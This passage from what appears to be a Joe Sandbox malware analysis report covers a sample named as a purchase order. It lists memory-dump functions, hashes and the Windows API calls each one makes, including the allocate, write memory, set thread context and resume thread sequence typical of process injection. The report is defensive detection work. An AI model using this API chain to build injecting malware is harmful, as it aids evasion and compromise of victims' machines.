                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          • Opcode ID: 1e77a8808ad68b59c8e657c51d3fedaa42fadcf489c6869b11219667e7fac9c1
                                                                          • Instruction ID: 667ffeb416d65dfa09022dcd779a67320b46cb68eb3541c619396df87b106b97
                                                                          • Opcode Fuzzy Hash: 1e77a8808ad68b59c8e657c51d3fedaa42fadcf489c6869b11219667e7fac9c1
                                                                          • Instruction Fuzzy Hash: 104129B59003098FDB14CF99C448AAABBF5FF99314F25C499D419A7321D334E841DFA1
                                                                          Function 04A25E98 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04A273F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 50f5e9681773a146a6b6d6e0b18d5fb15e537ab250f329adde54b6dd54e219af
                                                                          • Instruction ID: 5266323df44dd018a7ac6999bb72b19d44e7171a3a0c4444de73d49deac5846f
                                                                          • Opcode Fuzzy Hash: 50f5e9681773a146a6b6d6e0b18d5fb15e537ab250f329adde54b6dd54e219af
                                                                          • Instruction Fuzzy Hash: AD41E2B0D0061DCBDB25DFA9C944BDEBBB5BF49304F20806AD408AB251DB75694ACF91
                                                                          Function 04A27335 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04A273F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 2f344011e6dd3f960d0704e5405bf90088b37823762218463ebfe7d9cd2faa4f
                                                                          • Instruction ID: 3cc4824c2417e486bc425c562a25d59d114dcf6b5c8f39b119848ea0b495890e
                                                                          • Opcode Fuzzy Hash: 2f344011e6dd3f960d0704e5405bf90088b37823762218463ebfe7d9cd2faa4f
                                                                          • Instruction Fuzzy Hash: EB41E2B4D00619CFDB25DFA9C944BCEBBB5BF49304F20806AD408AB251DB75694ACF91
                                                                          Function 05138B49 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05138BE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: d7a218b746fa0baa4dbbf53b32b819e66f70d171e1053f352ff1ddcf99f33814
                                                                          • Instruction ID: 50bba64c4f677b68a44af1bfc2285aceba4a5173abdb575ab8e0cf85567bbc25
                                                                          • Opcode Fuzzy Hash: d7a218b746fa0baa4dbbf53b32b819e66f70d171e1053f352ff1ddcf99f33814
                                                                          • Instruction Fuzzy Hash: DB2137B1D003499FDB10DFA9C885BEEBBF5FF88310F108429E959A7240D7789555CBA1
                                                                          Function 05138B50 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05138BE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 53822d31714380ad6e6114f05a6fb398bebbfb40903b4d99652003fb81b35632
                                                                          • Instruction ID: 6bc8ed055df4a1ef15fc27a675e2876d060ee9caabc585e6f86b1ff8704d429d
                                                                          • Opcode Fuzzy Hash: 53822d31714380ad6e6114f05a6fb398bebbfb40903b4d99652003fb81b35632
                                                                          • Instruction Fuzzy Hash: F62139B1D003499FCB10DFA9C885BDEBBF5FF88314F108429E919A7240C778A945CBA1
                                                                          Function 05138C38 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05138CC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: dd976f1248b70fe3faa78da151e3776522d09724bffe672fe98a52820416ff24
                                                                          • Instruction ID: 4a3917518e8d458455563700fd28aa40b37aa13b6a9f63f2c4e7cc6dfb5eea29
                                                                          • Opcode Fuzzy Hash: dd976f1248b70fe3faa78da151e3776522d09724bffe672fe98a52820416ff24
                                                                          • Instruction Fuzzy Hash: 9D2166B1D003499FCB10DFAAC845AEEFBF4FF88310F508829E519A3240D738A945CBA1
                                                                          Function 051389B0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05138A36
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: bfc4be6fe145546f0c6de6e53bc6d2b82c5c1da75d442b6adae1269eec915f3f
                                                                          • Instruction ID: 8af9104c26712f46046b0e4b60f14e489a6b2e42c85f712593eabc5cde5fb8d9
                                                                          • Opcode Fuzzy Hash: bfc4be6fe145546f0c6de6e53bc6d2b82c5c1da75d442b6adae1269eec915f3f
                                                                          • Instruction Fuzzy Hash: E6213972D003099FDB10DFAAC4857EEBFF4EB88314F548429D459A7240DB789945CFA1
                                                                          Function 04A2EF78 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04A2F66E,?,?,?,?,?), ref: 04A2F72F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 81b5b3ba3d926c8885f7fcfaeac1cdfb4dfac892ce204a1bfa2802cde7123fc7
                                                                          • Instruction ID: 1fb0bd08db16b4239c5d427f62bec1d65e7f64493dc327fc73f025f2f30c41be
                                                                          • Opcode Fuzzy Hash: 81b5b3ba3d926c8885f7fcfaeac1cdfb4dfac892ce204a1bfa2802cde7123fc7
                                                                          • Instruction Fuzzy Hash: 9321E3B5D00259AFDB10CFAAD984ADEFBF8EB48310F14801AE918A3350D374A955DFA5
                                                                          Function 05138C40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05138CC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          • Opcode ID: f519485e15c84c42bae8ba226304b304e9d4d3aeab730ddd9b4aab9c09d7362a
                                                                          • Instruction ID: 208b53a9c80e6fa3fd6d18be188452848617e2176be0c21216f91c8bf118eb60
                                                                          • Opcode Fuzzy Hash: f519485e15c84c42bae8ba226304b304e9d4d3aeab730ddd9b4aab9c09d7362a
                                                                          • Instruction Fuzzy Hash: 0D213AB1D013499FCB10DFAAC845ADEFBF5FF88310F508429E519A7250D7389545DBA1
                                                                          Function 051389B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05138A36
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: d1c989041502fa023a0a3c049fb57dec309e007e2d07431b568703b4a40baf85
                                                                          • Instruction ID: 9cc4fd592aefc3938e9f7b2799515cc04daf1bc26b13e5c7dcb3d56b9d6910d5
                                                                          • Opcode Fuzzy Hash: d1c989041502fa023a0a3c049fb57dec309e007e2d07431b568703b4a40baf85
                                                                          • Instruction Fuzzy Hash: 28210772D002099FDB10DFAAC4857AEBBF4AB88314F548429D419A7240DB78A945CBA1
                                                                          Function 0513B64B Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0513B615
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: f20096484867261c5d4b17044d465aa5881b1d69be1e81cb94905161258a005c
                                                                          • Instruction ID: c0b3227a6cc6637cd087ce594ec9e07f1e85b195b1de93d5391cfeb12c0f6709
                                                                          • Opcode Fuzzy Hash: f20096484867261c5d4b17044d465aa5881b1d69be1e81cb94905161258a005c
                                                                          • Instruction Fuzzy Hash: 2A11D3B1E092288BDB21EF55E4167EEBFF1AF88300F158469C481BB242DB355949DBA0
                                                                          Function 05138A88 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05138AFE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 8b11bec32e2ec6aa5b3243705b1cfbb415c399a6627bd4da8aadb58402bd7f0e
                                                                          • Instruction ID: dee5eecf4e9e252f1659f234e449c4104b1484084012e13931a22e54f8cb840c
                                                                          • Opcode Fuzzy Hash: 8b11bec32e2ec6aa5b3243705b1cfbb415c399a6627bd4da8aadb58402bd7f0e
                                                                          • Instruction Fuzzy Hash: DF1147B2D002499FCB10DFAAC845AEFFFF5EB88324F148419E569A7250C735A545CBA1
                                                                          Function 05138091 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 9cdf1b53d7ab0e51b9f43ed4482de39abe96c4e44b554b61933df7ff28fac567
                                                                          • Instruction ID: 3e29ab256ad9f7fd35d8756e6d62482bdcd9627d03bb7e4daaa196620edc2fed
                                                                          • Opcode Fuzzy Hash: 9cdf1b53d7ab0e51b9f43ed4482de39abe96c4e44b554b61933df7ff28fac567
                                                                          • Instruction Fuzzy Hash: F51176B1D002498FDB20DFAAC445BEEFFF4AB88324F248819D419A7240CB39A545CBA5
                                                                          Function 05138A90 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05138AFE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: b07e4180e6c86d0a0cc6aeab2dd3470839eca2d989f57188d12bc0b70d9a870b
                                                                          • Instruction ID: f146261ab18b82aa74661d6d7c6e8963d92be16456ec00290ea66ca8e9da6f69
                                                                          • Opcode Fuzzy Hash: b07e4180e6c86d0a0cc6aeab2dd3470839eca2d989f57188d12bc0b70d9a870b
                                                                          • Instruction Fuzzy Hash: D51123B2D002499FCB10DFAAC845ADEBFF5EB88324F248419E519A7250CB75A945CBA1
                                                                          Function 05138098 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: c46c9028974c515f210e4797a4e3caaee77c8e597ac515e469579d475e2fd7d0
                                                                          • Instruction ID: b0b9029052171c0f84960b70aa2d61ab00a9b10c27b3f5d1f8bbfcc62bae6f39
                                                                          • Opcode Fuzzy Hash: c46c9028974c515f210e4797a4e3caaee77c8e597ac515e469579d475e2fd7d0
                                                                          • Instruction Fuzzy Hash: 851106B1D003498FDB20DFAAC4457DEFFF5EB88324F248419D519A7240CB79A945CBA5
                                                                          Function 05131C48 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0513B615
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: e2bbab55070def852b56cdefc955e498e13fbf7f6db6841d4d60abb9ab4a84f1
                                                                          • Instruction ID: 1ec88d1583878ba91c8418407416bebc95430073d7d6f40a5c269ad7b35c5e27
                                                                          • Opcode Fuzzy Hash: e2bbab55070def852b56cdefc955e498e13fbf7f6db6841d4d60abb9ab4a84f1
                                                                          • Instruction Fuzzy Hash: 581122B58043499FDB10DF8AC949BEEBBF8EB48314F108419E958A7200D375A944CFA5
                                                                          Function 04A2D3C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 04A2D426
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 93e7f63159f0ebc3bb5c3bdd11193d0b8fe81bdd2302f49375cc112d532f779f
                                                                          • Instruction ID: ba0f6a01ad1afb59b270695334144c6e9ebab2b5ef3dd37e1986d7737da8103f
                                                                          • Opcode Fuzzy Hash: 93e7f63159f0ebc3bb5c3bdd11193d0b8fe81bdd2302f49375cc112d532f779f
                                                                          • Instruction Fuzzy Hash: 9E1110B5C006498FCB10DF9AD544ADEFBF4EB88314F14841AD419B7601C375A546CFA1
                                                                          Function 0513B5B3 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0513B615
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Opcode ID: 20c600bac8303d82352e752dcc1a3b29ff48510b2962db6ca14e50a1de5169e4
                                                                          • Instruction ID: 8a3361316c03f7ef8dbf7b80fa7e26888940a612f7d08e9ec9a450d1698d559a
                                                                          • Opcode Fuzzy Hash: 20c600bac8303d82352e752dcc1a3b29ff48510b2962db6ca14e50a1de5169e4
                                                                          • Instruction Fuzzy Hash: 4B11F2B58002499FDB10DF99C989BDEFBF8EB48324F148419E559A7200D375A984CFA1
                                                                          Function 04B7CB10 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          • Opcode ID: 589612be4079478317ad2d64bbe0d996260b086a0c6f0a01912596202900b813
                                                                          • Instruction ID: 521415073cff75013b3d007888fe7f70c3f208a81e830b1c99782fcf5ea05ae3
                                                                          • Opcode Fuzzy Hash: 589612be4079478317ad2d64bbe0d996260b086a0c6f0a01912596202900b813
                                                                          • Instruction Fuzzy Hash: 0BD1D93590020ACFCF04CFA8C5948E9BBB1FF58314B159699D816A7255EB74BE86CF80
                                                                          Function 04B7CB0F Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: 439b794e0ad69c0491b4e1410a3822d929b1b12f251cb678429dfd4a94385cf3
                                                                          • Instruction ID: 59810fb9144fbe88836124e945234d087909289b20aaf7acea75ce3b87685d42
                                                                          • Opcode Fuzzy Hash: 439b794e0ad69c0491b4e1410a3822d929b1b12f251cb678429dfd4a94385cf3
                                                                          • Instruction Fuzzy Hash: 1F91DA3590020ACFCF05DFA4C4948DDB7B1FF98314B219659D81AAB259EB74BD8ACF80
                                                                          Function 04B7C69F Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          • Opcode ID: beaee7794bc2a84de285176e083d6f0cfe132aa6393472291646b9d0dff2d486
                                                                          • Instruction ID: 5d5abc0a93143fed664ca6cf2262ce1306287fe4e55621742a3b7bf3f94f31c6
                                                                          • Opcode Fuzzy Hash: beaee7794bc2a84de285176e083d6f0cfe132aa6393472291646b9d0dff2d486
                                                                          • Instruction Fuzzy Hash: E381CB3590060ACFCF05DFA4C4948DDB7B1FF583147219699D85AAB259EB34BE8ACF80
                                                                          Function 0705BE04 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Tecq
                                                                          • API String ID: 0-1122318316
                                                                          • Opcode ID: 5d5692e6c9fd425c225a39f9d6833c2ded279c77f6b2eda93dc5903196e98bb5
                                                                          • Instruction ID: 529ea26a7b1aa24be2ff52ebac17610cf107517f6d44b031d9f3695d94093e60
                                                                          • Opcode Fuzzy Hash: 5d5692e6c9fd425c225a39f9d6833c2ded279c77f6b2eda93dc5903196e98bb5
                                                                          • Instruction Fuzzy Hash: 7551C0B5B002168FCB10DB79C8545AFBBF6FFC53107248A69E855DB391EB30AD058B91
                                                                          Function 0705C800 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: r
                                                                          • API String ID: 0-1812594589
                                                                          • Opcode ID: 4b4b96be32c4b45e4f11e7c9075da8df2ced7074252ac0e1ae4567c79f3cbede
                                                                          • Instruction ID: 1a7b0100605333c0dda101553727a54360f748b52c8caf3d1afd00ab9fa5bdb5
                                                                          • Opcode Fuzzy Hash: 4b4b96be32c4b45e4f11e7c9075da8df2ced7074252ac0e1ae4567c79f3cbede
                                                                          • Instruction Fuzzy Hash: 5F61E2B8A00206DBD704DFA8C5889AEFBB6FF48300B64C695D81597355D735EE82CFA0
                                                                          Function 070597B9 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq
                                                                          • API String ID: 0-1855696158
                                                                          • Opcode ID: c3363d3b5b9b786c7656a784c8cacfe24a3a1b6194a4b9fb7c9549cbd9a35434
                                                                          • Instruction ID: 95edcae17546c863a7c9a480560cc6d415379799a0345c37a719727104373135
                                                                          • Opcode Fuzzy Hash: c3363d3b5b9b786c7656a784c8cacfe24a3a1b6194a4b9fb7c9549cbd9a35434
                                                                          • Instruction Fuzzy Hash: 4B515DB1E2474ACFDF15CFAAC5406EEBBF6AF89300F25461AD855AB241D370B941CB40
                                                                          Function 07059168 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'cq
                                                                          • API String ID: 0-182294849
                                                                          • Opcode ID: 9fdfc39a4ffb068ffaa94e689ac03f55cbbce4ec2962dccfaf2477cac2f8516b
                                                                          • Instruction ID: d6cc8afd865a024d0c4635821d4faef1d9ca6408cf827bd205492c28f9696cdc
                                                                          • Opcode Fuzzy Hash: 9fdfc39a4ffb068ffaa94e689ac03f55cbbce4ec2962dccfaf2477cac2f8516b
                                                                          • Instruction Fuzzy Hash: 844158B4610115DFCB04DF69C988AAE7BB6FB89311F020569E916CB3A1CB34ED81CB90
                                                                          Function 04B738E0 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Hgq
                                                                          • API String ID: 0-2103768809
                                                                          • Opcode ID: 3a1ecd4cbc4bef40cbe941f214973004e5d7ff25e2a9aac82215e1b4d5b9d826
                                                                          • Instruction ID: 4aee240b98c43ac3132bab1ec35d0700b1a71554539056e2be34b5c117a96c48
                                                                          • Opcode Fuzzy Hash: 3a1ecd4cbc4bef40cbe941f214973004e5d7ff25e2a9aac82215e1b4d5b9d826
                                                                          • Instruction Fuzzy Hash: 7421D730A001089BEB04EF68C519AAF7BF6EF88314F14406DE906AB395DF75AD05D7A1
                                                                          Function 0705C7FF Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: r
                                                                          • API String ID: 0-1812594589
                                                                          • Opcode ID: 2099c71dda000e24b28344f406f18afd43bd117ec296c3e33bfa36bc68d0fedd
                                                                          • Instruction ID: ae22c6ac60902fd0e4aa8e9e33909799cf7b3cc11b329ac174cc08ad03ef19b0
                                                                          • Opcode Fuzzy Hash: 2099c71dda000e24b28344f406f18afd43bd117ec296c3e33bfa36bc68d0fedd
                                                                          • Instruction Fuzzy Hash: A3212CB4E05319CFDB08CFAAC5485AEBBB2FF89301B10C5A9D815A7360D7399A42CF51
                                                                          Function 0705E890 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Tecq
                                                                          • API String ID: 0-1122318316
                                                                          • Opcode ID: bd1deb7a3903b164d2f21a8e51987a1398e8452e3fccbcf2eaf328415388003d
                                                                          • Instruction ID: 519151e80f358f7abb06e6bace7e3c2eb288acea7769ac5736a95cddb40ce46b
                                                                          • Opcode Fuzzy Hash: bd1deb7a3903b164d2f21a8e51987a1398e8452e3fccbcf2eaf328415388003d
                                                                          • Instruction Fuzzy Hash: 2E111FB5B0021A8BCF54EBB9D9105FFB7F6AB84211B144179C945EB284EB319E02CBA1
